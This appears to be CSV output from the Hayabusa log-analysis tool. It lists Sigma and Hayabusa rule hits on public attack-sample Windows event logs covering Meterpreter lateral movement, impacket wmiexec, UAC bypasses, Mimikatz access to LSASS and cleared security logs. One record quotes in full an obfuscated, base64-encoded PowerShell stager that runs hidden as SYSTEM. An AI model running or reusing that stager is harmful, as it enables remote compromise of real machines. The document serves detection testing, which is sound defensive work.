2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: powershell.exe  -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd  1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  /all   :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding  :  Path: C:\Windows\System32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd  1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  /all   :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe  :  Path: C:\Windows\System32\VSSVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp""  :  Path: C:\Windows\Installer\MSI4FFD.tmp  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx
2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570  :  LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570  :  LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""   :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe   :  Path: C:\Windows\System32\wsqmcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev   :  Path: C:\Windows\System32\sdclt.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp   :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
